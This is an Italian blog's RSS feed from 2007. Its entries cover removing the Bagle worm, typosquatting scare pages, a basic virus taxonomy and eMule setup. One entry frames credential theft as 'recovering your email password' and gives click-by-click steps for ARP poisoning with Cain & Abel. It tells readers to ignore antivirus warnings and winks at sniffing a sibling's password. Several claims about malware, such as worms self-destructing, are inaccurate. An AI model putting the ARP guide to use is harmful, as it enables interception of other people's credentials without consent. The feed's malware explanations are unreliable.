&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\WINDOWS\System32\wintems.exe&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\WINDOWS\system32\hldrrr.exe &lt;/font&gt;&lt;/em&gt;
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;folders to delete: &lt;/font&gt;&lt;/em&gt;
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\WINDOWS\exefld&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;registry keys to delete:&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;HKLM\SYSTEM\CurrentControlSet\Services\m_hook&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;HKLM\SYSTEM\CurrentControlSet\Enum\Root\&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;LEGACY_M_HOOK&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;  
&lt;p align=left&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;registry values to delete:&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;HKLM\Software\Microsoft\Windows\Current&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;Version\Run\ hldrrr&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;  
&lt;p align=left&gt;&lt;font color="#00ff00" size=5&gt;Ricordare che la sigla %SystemDrive% e [utente corrente] devono essere rispettivamente sostituiti con l'unità hardware in questione e il nome dell'utente.&lt;/font&gt; 
&lt;p align=left&gt;&lt;font color="#00ff00" size=5&gt;Alla fine, salvate il file e chiudete il Blocco Note. Adesso che abbiamo il nostro bel script fatto in casa, dobbiamo caricarlo con The Avenger. Alla fine della scansione, The Avenger ci chiederà di riavviare il PC e quindi voi effettuate il riavvio. Dopo il riavvio, ci verrà mostrato il log delle scansioni. Continuiamo la nostra caccia a Bagle usando l'editor del registro inserendo, da Start - Esegui, il comando &lt;font color="#ff6600"&gt;regedit&lt;/font&gt;&lt;font color="#00ff00"&gt; e cerchiamo la chiave &lt;/font&gt;&lt;font color="#ff0000"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows&lt;/font&gt;&lt;/font&gt;&lt;font color="#00ff00" size=5&gt;&lt;font color="#ff0000"&gt;\CurrentVersion\Run&lt;/font&gt;&lt;font color="#00ff00"&gt;.&lt;/font&gt;&lt;/font&gt; 
&lt;p align=left&gt;&lt;font color="#00ff00" size=5&gt;Adesso nella finestra di destra cerchiamo le voci &lt;font color="#ff0000"&gt;hldrrr&lt;/font&gt;&lt;font color="#00ff00"&gt;, &lt;/font&gt;&lt;font color="#ff0000"&gt;drvsyskit&lt;/font&gt;&lt;font color="#00ff00"&gt; e &lt;/font&gt;&lt;font color="#ff0000"&gt;german.exe&lt;/font&gt;&lt;font color="#00ff00"&gt;; se le abbiamo trovate, eliminatele, assieme alle chiavi &lt;/font&gt;&lt;font color="#ff0000"&gt;HKEY_CURRENT_USER\Software\DateTime4&lt;/font&gt;&lt;font color="#00ff00"&gt;, &lt;/font&gt;&lt;font color="#ff0000"&gt;HKEY_CURRENT_USER\Software\FirstRRRun&lt;/font&gt;&lt;font color="#00ff00"&gt;.&lt;/font&gt;&lt;/font&gt; 
&lt;p align=left&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; &lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-9036054891036908415&amp;page=RSS%3a+Un+nuovo+nemico%3a+Win32%2fBagle&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=crypto1993.spaces.live.com&amp;amp;GT1=crypto1993"&gt;</description><comments>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!410.entry#comment</comments><guid isPermaLink="true">http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!410.entry</guid><pubDate>Thu, 15 Mar 2007 15:47:37 GMT</pubDate><slash:comments>2</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://crypto1993.spaces.live.com/blog/cns!82997BF3A0D06481!410/comments/feed.rss</wfw:commentRss><wfw:comment>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!410.entry#comment</wfw:comment><dcterms:modified>2007-03-15T16:33:00Z</dcterms:modified></item><item><title>Come recuperare la password dell'e-mail box</title><link>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!404.entry</link><description>&lt;div&gt;&lt;font face="Verdana, Geneva, Arial, Sans-serif" color="#ff0000" size=5&gt;Capita, a volte, che qualcuno possa dimenticare la password della propria e-mail box (la casella di posta elettronica diversa ed unica sul Web per ogni utente registrato al servizio/provider). Allora, lì per lì, l'utente si strappa i capelli dalla testa, cercando di spremersi le meningi in modo da ricordare la password. Esiste un metodo un pò più semplice per recuperare la password perduta.&lt;/font&gt;&lt;/div&gt;
&lt;div&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font color="#0000ff" size=5&gt;Kamui The Best&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#0000ff" size=5&gt;&lt;em&gt;alla ricerca della password perduta&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font size=5&gt;
&lt;hr&gt;
&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face="Garamond, Times, Serif" color="#00ff00" size=5&gt;&lt;strong&gt;&lt;em&gt;Per recuperare la nostra password (anche a me, una volta, è successo, poi ho risolto la situazione in questo modo), occorre possedere diversi requisiti:&lt;/em&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#00ff00"&gt;&lt;/font&gt;&lt;/strong&gt;&lt;font size=5&gt; &lt;/font&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#ffff00" size=5&gt;&lt;em&gt;il programma Cain &amp;amp; Abel&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#ffff00" size=5&gt;&lt;em&gt;driver WinPcap v4.0 beta2&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/ul&gt;
&lt;p align=left&gt;&lt;font size=5&gt;&lt;strong&gt;&lt;font face=Garamond color="#00ff00"&gt;&lt;em&gt;A questo punto, possiamo avventurarci alla ricerca della password perduta...&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt; &lt;/font&gt;
&lt;p align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#00ff00"&gt;&lt;/font&gt;&lt;/strong&gt;&lt;font size=5&gt;  &lt;/font&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff0000"&gt;&lt;font size=5&gt;per prima cosa, occorre installare il programma Cain &amp;amp; Abel &lt;font color="#ffff00"&gt;(Nota: alcuni antivirus, come Norton o Kaspersky, possono indentificare Cain &amp;amp; Abel come software pericoloso; in tal caso, ignoriamo tutto)&lt;/font&gt;&lt;font color="#ff0000"&gt;;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000" size=5&gt;a questo punto subentrano i driver WinPcap v4.0 beta2: al termine dell'installazione di Cain &amp;amp; Abel, infatti, verrà richiesta l'installazione di questi driver, che tra l'altro sono necessari, in quanto senza di essi Cain &amp;amp; Abel non sarebbe in grado di reperire la password;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;adesso, dopo queste installazioni, avviamo Cain &amp;amp; Abel. Dopo averlo avviato, passiamo alla schermata &lt;font color="#ffff00"&gt;Configure - Sniffer &lt;/font&gt;&lt;font color="#ff0000"&gt;ed impostiamo la schede di rete che usiamo per connetterci ad Internet;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;dall'interfaccia principale del programma, premiamo sul pulsante &lt;font color="#ffff00"&gt;Start/Stop Sniffer&lt;/font&gt;&lt;font color="#ff0000"&gt;, facciamo clic col tasto destro del mouse su un punto vuoto della finestra, e, dal menu contestuale, facciamo clic su &lt;/font&gt;&lt;font color="#ffff00"&gt;Scan MAC&lt;/font&gt;&lt;font color="#ffff00"&gt; Adress &lt;/font&gt;&lt;font color="#ff0000"&gt;e confermiamo cliccando su OK;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#0000ff"&gt;&lt;font size=5&gt;(FASE FACOLTATIVA) &lt;font color="#ff0000"&gt;Nel caso non si conosca il proprio IP Adress, dovete aprire il prompt dei comandi (&lt;/font&gt;&lt;font color="#ffff00"&gt;Start - Tutti i programmi - Accessori - Prompt dei comandi &lt;/font&gt;&lt;font color="#ff0000"&gt;oppure facendo Start - Esegui ed inserendo nel campo sottostante &lt;/font&gt;&lt;font color="#ffff00"&gt;cmd&lt;/font&gt;&lt;font color="#ff0000"&gt;). Dopo aver aperto il prompt, inserite il comando &lt;/font&gt;&lt;font color="#ffff00"&gt;ipconfig &lt;/font&gt;&lt;font color="#ff0000"&gt;e premete Invio. A questo punto, cercate la voce Indirizzo IP e, accanto a questa scritta, c'è una serie di numeri: quello è il vostro indirizzo IP;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;adesso ritorniamo su Cain &amp;amp; Abel e premiamo su &lt;font color="#ffff00"&gt;APR&lt;/font&gt;&lt;font color="#ff0000"&gt;, spostandoci sulla sezione Sniffer e cliccando sul tab APR; a questo punto, clicchiamo in una zona vuota all'interno dell'area &lt;/font&gt;&lt;font color="#ffff00"&gt;Configuration/Routed Packets&lt;/font&gt;&lt;font color="#ff0000"&gt; e premiamo il pulsante &lt;/font&gt;&lt;font color="#ffff00"&gt;Add to list&lt;/font&gt;&lt;font color="#ff0000"&gt; nella barra degli strumenti (quello a forma di +);&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;apparirà a video la nuova schermata &lt;font color="#ffff00"&gt;New ARP Poison Routing&lt;/font&gt;&lt;font color="#ff0000"&gt;. Scorrete la lista di sinistra ed identificate un IP Adress casuale (quello di vostra sorella va benissimo...), mentre nella lista di destra scegliete quello del vostro router/modem. Alla fine, cliccate su OK per procedere;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000" size=5&gt;adesso, selezionando il vostro IP Adress, vi apparirà automaticamente la vostra amata password; per quanto riguarda l'IP Adress di vostra sorella, beh, un pò di immaginazione... 
&lt;hr&gt;
&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/ol&gt;
&lt;p align=right&gt;&lt;font face="Courier New, Courier, Monospace" color="#800080" size=5&gt;&lt;em&gt;..:Kamui The Best:..&lt;/em&gt;&lt;/font&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-9036054891036908415&amp;page=RSS%3a+Come+recuperare+la+password+dell'e-mail+box&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=crypto1993.spaces.live.com&amp;amp;GT1=crypto1993"&gt;</description><comments>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!404.entry#comment</comments><guid isPermaLink="true">http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!404.entry</guid><pubDate>Sun, 11 Mar 2007 12:37:43 GMT</pubDate><slash:comments>0</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://crypto1993.spaces.live.com/blog/cns!82997BF3A0D06481!404/comments/feed.rss</wfw:commentRss><wfw:comment>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!404.entry#comment</wfw:comment><dcterms:modified>2007-03-15T16:26:48Z</dcterms:modified></item><item><title>Il gemello cattivo: attenti a quello che scrivete!</title><link>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!353.entry</link><description>&lt;div align=center&gt;&lt;font face="Garamond, Times, Serif" size=6&gt;Il gemello cattivo:&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;font face=Garamond size=6&gt;Attenti a quello che scrivete!&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face="Geneva, Arial, Sans-serif" color="#0000ff" size=5&gt;Una bella navigata in Internet, che bello!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face="Geneva, Arial, Sans-serif" color="#ff0000" size=5&gt;Spesso capita di sbagliare URL di un sito, ma a volte sbagliare ci porta ad un'infezione di virus totale. Tutto funziona così: siete tornati dall'ufficio o avete appena finito di fare i compiti e volete fare una bella navigata su Internet. Cerchiamo delle belle foto di automobili oppure l'ultimissima recensione sulla PlayStation 3, e per farlo, si sa, si usa un motore di ricerca. Il motore di ricerca più famoso è certamente Google (che ricordiamo ha comprato anche YouTube, il sito dove si trovano i video musicali). Quindi digitiamo www.google.it, ma, per sbaglio, non ci accorgiamo che abbiamo messo gookle, invece di google. Nessun problema, visto che la schermata che appare è uguale alla schermata che appare se entriamo in Google, ma cosa succede internamente al nostro software? Tutto comincia ad essere infettato da miriadi di virus.&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#0000ff" size=5&gt;Che fare?&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;La soluzione è e rimarrà sempre una: avviare una full scan con un ottimo antivirus (Norton o Kaspersky vanno benissimo). Il virus che avvia download immediati (si parla di 5 millisecondi per virus acquisito) viene definito virus &lt;font color="#0000ff"&gt;Typosquatting&lt;/font&gt;&lt;font color="#ff0000"&gt;. Esso, quando è avviatosi, presentasi con una scritta simile:&lt;/font&gt;&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;VIRUS ALERT!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;YOUR PC IS INFECTED!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;IT HAS BEEN DETECTED THAT YOUR PC HAS LEAST 3 DANGEROUS VIRUSES!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;TO KNOW FOR SURE YOU URGENTLY NEED TO RUN AN ANTIVIRUS TEST ON YOUR PC!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;The consequences of spyware and virus presence on your pc might belike: loosing all the data, data might be stolen, your secrets might beexsposed. PROTECT YOUR PC! REMOVE ALL VIRUSES NOW!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;Naturalmente compare poi il pulsante che ci consente di avviare una &amp;quot;full scan&amp;quot; per rimuovere i virus. Ma questa è solo una scusa: cliccando su tale pulsante, infatti, non farete altro che scaricare altre centinaia di virus!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Times New Roman, Times, Serif" color="#00ff00" size=5&gt;Il seguente intervento verrà inserito nell'Area Sicurezza Informatica del sito dopo il 25 febbraio 2007. &lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Times New Roman" color="#00ff00" size=5&gt;Tale intervento è disponibile sia in questo URL che in quello dell'Area Sicurezza Informatica.&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div align=right&gt;&lt;font face="Courier New, Courier, Monospace" color="#0000ff" size=5&gt;&lt;em&gt;..:Kamui The Best:..&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt; &lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-9036054891036908415&amp;page=RSS%3a+Il+gemello+cattivo%3a+attenti+a+quello+che+scrivete!&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=crypto1993.spaces.live.com&amp;amp;GT1=crypto1993"&gt;</description><comments>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!353.entry#comment</comments><guid isPermaLink="true">http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!353.entry</guid><pubDate>Thu, 01 Feb 2007 15:53:18 GMT</pubDate><slash:comments>1</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://crypto1993.spaces.live.com/blog/cns!82997BF3A0D06481!353/comments/feed.rss</wfw:commentRss><wfw:comment>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!353.entry#comment</wfw:comment><dcterms:modified>2007-03-11T10:38:28Z</dcterms:modified></item><item><title>Area Sicurezza Informatica</title><link>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!230.entry</link><description>&lt;p align=center&gt; &lt;font face=Arial color="#00ffff" size=6&gt;Area &amp;quot;Sicurezza Informatica&amp;quot;&lt;/font&gt; 
&lt;p align=center&gt;&lt;font face=Arial color="#ff0000" size=4&gt;&lt;em&gt;Moduli creati da Kamui The Best&lt;/em&gt;&lt;/font&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=4&gt;&lt;/font&gt;&lt;/em&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=4&gt;SEZIONE 1: I VIRUS&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ffff00" size=4&gt;In questa prima sezione ci soffermeremo su un fenomeno assai comune, soprattutto per i navigatori della rete (vale anche per noi bloggatori e webmasters...), quello dei virus. Quando uno ha dei problemi in Internet, la prima cosa che pensa è l'effetto di qualche virus. Ma cosa sono i virus? La domanda sembrerà banale, ma cela una descrizione pazzesca e ha un enorme lavoro sull'uso di codici alle spalle.&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;font color="#ffff00"&gt;&lt;/font&gt;  
&lt;p align=left&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff6600" size=4&gt;&lt;em&gt;I virus sono dei programmi, creati dai virus writer, composti da diverse parti:&lt;/em&gt;&lt;/font&gt; 
&lt;ol&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff6600" size=4&gt;&lt;em&gt;stringhe replicate;&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff6600" size=4&gt;&lt;em&gt;routine di ricerca, usata per la ricerca del file bersaglio;&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff6600" size=4&gt;&lt;em&gt;routine di attivazione, usata per l'attivazione vera e propria del virus;&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff6600" size=4&gt;&lt;em&gt;playload&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;&lt;/ol&gt;
&lt;p align=left&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff6600" size=4&gt;&lt;em&gt;In base ai parametri predisposti dai virus writer, abbiamo due tipi di virus, quelli definiti a &lt;font color="#0000ff"&gt;ciclo degenerativo comune&lt;/font&gt;&lt;font color="#ff6600"&gt;, ovvero quei virus che rispondo a determinati parametri pre-impostati, e quelli definiti a &lt;/font&gt;&lt;font color="#0000ff"&gt;ciclo selettivo&lt;/font&gt;&lt;font color="#ff6600"&gt;, ovvero quei virus che, per così dire, hanno i loro gusti. Abbiamo già fatto una prima classificazione sui virus, ma ne sistono altre, come ad esempio, la classificazione dei virus in base al tipo e a quali oggetti è orientato. Stavolta abbiamo più conocrrenti:&lt;/font&gt;&lt;/em&gt;&lt;/font&gt; 
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#0000ff" size=4&gt;spyware &lt;font color="#ff6600"&gt;- sono i virus situati sul Web che si &amp;quot;camuffano&amp;quot; da semplici banner;&lt;/font&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;li&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#0000ff" size=4&gt;adware &lt;font color="#ff6600"&gt;- altri virus situati sul Web che si camuffano, stavolta, all'interno degli inserti pubblicitari (popup)&lt;/font&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;li&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#0000ff" size=4&gt;worm &lt;font color="#ff6600"&gt;- i virus, in termini informatici, più semplici, spesso definiti anche kamikaze, perchè, non appena terminano la fase di infezione, si autodistruggono;&lt;/font&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;li&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#0000ff" size=4&gt;rabbit &lt;font color="#ff6600"&gt;- la parola rabbit, se tradotta, significa coniglio. La particolarità di questi virus è, quindi, la rapidità con cui si riproducono (come i conigli, appunto);&lt;/font&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;li&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#0000ff" size=4&gt;macrovirus &lt;font color="#ff6600"&gt;- questi virus sono completamente diversi da quelli sopraelencati, perchè non puntano contro le funzionalità di Internet, compromettendole, ma puntano ai programmi dell'unita C del PC, soprattutto quelli del pacchetto Office (Microsoft Word, Microsoft Excel, Microsoft Database, Microsoft Works, Microsoft Publisher, Microsoft FrontPage e Microsoft PowerPoint);&lt;/font&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;li&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#0000ff" size=4&gt;trojan &lt;font color="#ff6600"&gt;- probabilmente questo termine non sarà a tutti nuovo, perchè è il virus più diffuso.&lt;/font&gt;&lt;/font&gt;&lt;/em&gt;&lt;/ol&gt;
&lt;p&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff6600" size=4&gt;Naturalmente, a proteggervi ci sono gli antivirus (che applicano una tecnica che definisco &lt;font color="#0000ff"&gt;hybridization-neutralize&lt;/font&gt;&lt;font color="#ff6600"&gt;, ovvero ibridazione-neutralizzazione delle stringhe replicate di cui sono composti), ma se non avete nemmeno antivirus (cosa improbabile, comunque...), vi consiglio di attivare la funzione &lt;/font&gt;&lt;font color="#0000ff"&gt;Windows Firewall &lt;/font&gt;&lt;font color="#ff6600"&gt;che vi protegge, anche se in misura minore, dai virus e blcca i programmi dannosi.&lt;/font&gt;&lt;/font&gt;  
&lt;p&gt;&lt;font color="#ff0000"&gt;&lt;/font&gt;  
&lt;p&gt;&lt;font face="Geneva, Arial, Sans-serif" color="#ff0000" size=4&gt;&lt;em&gt;SEZIONE 2: I PROGRAMMI SHARING&lt;/em&gt;&lt;/font&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ffff00" size=4&gt;Chi di voi sa che cosa è eMule? Per chi non lo sapesse, eMule, e non solo, è un eccezionale programma sharing (sharing? Boh...). Di seguito, vi farò una descrizione sui programmi sharing.&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ffff00" size=4&gt;&lt;/font&gt;&lt;/em&gt;  
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ff6600" size=4&gt;Se traducete sharing, otterre un verbo: to share, che significa condividere. I programmi sharing, infatti, si basano sulla condivisione dei file sul Web. La cosa bella di questi programma è che potete scaricare, tramite condivisione file, tutto quello che volete. I principali  programmi sharing sono eMule, aventi diversi versioni, BearShare, LimeWire, Shareaza, Morpheus e tantissimi altri. I programmi sharing non sono tutti uguali, perchè utilizzano diverse tecnologie. Ad esempio, sia BearShare che LimeWire utilizzano la tecnologia Gnutella, ovvero quella tecnologia che permette di scaricare senza collegarsi ad un server. &lt;/font&gt;&lt;/em&gt;
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ffff00" size=4&gt;Adesso analizziamo il client eMule. Esso è il client sicuramente più usato in tutto il pianeta, ma non sempre dà i risulati che si  sperano di ottenere. Ora vi spiego il perchè.&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ff6600" size=4&gt;eMule è la versione successiva di eDonkey (da asino è diventato mulo). Se volete scaricarlo, cliccate &lt;a href="http://prdownloads.sourceforge.net/emule/eMule0.47c-Installer.exe"&gt;QUI&lt;/a&gt;. Uno dei tanti problemi che eMule può dare è l'ID Basso. Avere un ID Basso significa stare &amp;quot;in fondo alla lista&amp;quot;, ovvero impieghereste millenni per scaricare una canzone wav all'ultimo grido (una cosa che dovrebbe essere rapida!), quindi vi consiglio di seguire queste impostazioni. Naturalmente dovete scaricare il file .exe di installazione.&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ff6600" size=4&gt;Avviate l'eseguibile eMule0.47c-Installer.exe facendo Italiano e premendo Ok. Cliccate su Avanti e fate Accetto per accettare la licenza. Nella schermata successiva fate Avanti e con Sfoglia scegliete dove volete installare il programma. Cliccate su Installa e poi Fine.&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ff6600" size=4&gt;Adesso avviate eMule, e nella schermata che vi apparirà cliccate su Avanti. Digitate un nick a piacere e impostate le porte TCP e UDP (rispettivamente 44556 e 44557) usando quelle già configurate dal vostro router. Adesso cliccate su Testa Porte per verificare se tutto è ok, infine premete Avanti. Adesso nella finestra Server controlliamo che KAD e eD2K abbiano il segno di spunta. Confermate con Avanti e completate facendo Fine: così facendo apparirà il Wizard per le impostazioni della connessione.&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ff6600" size=4&gt;&lt;/font&gt;&lt;/em&gt;  
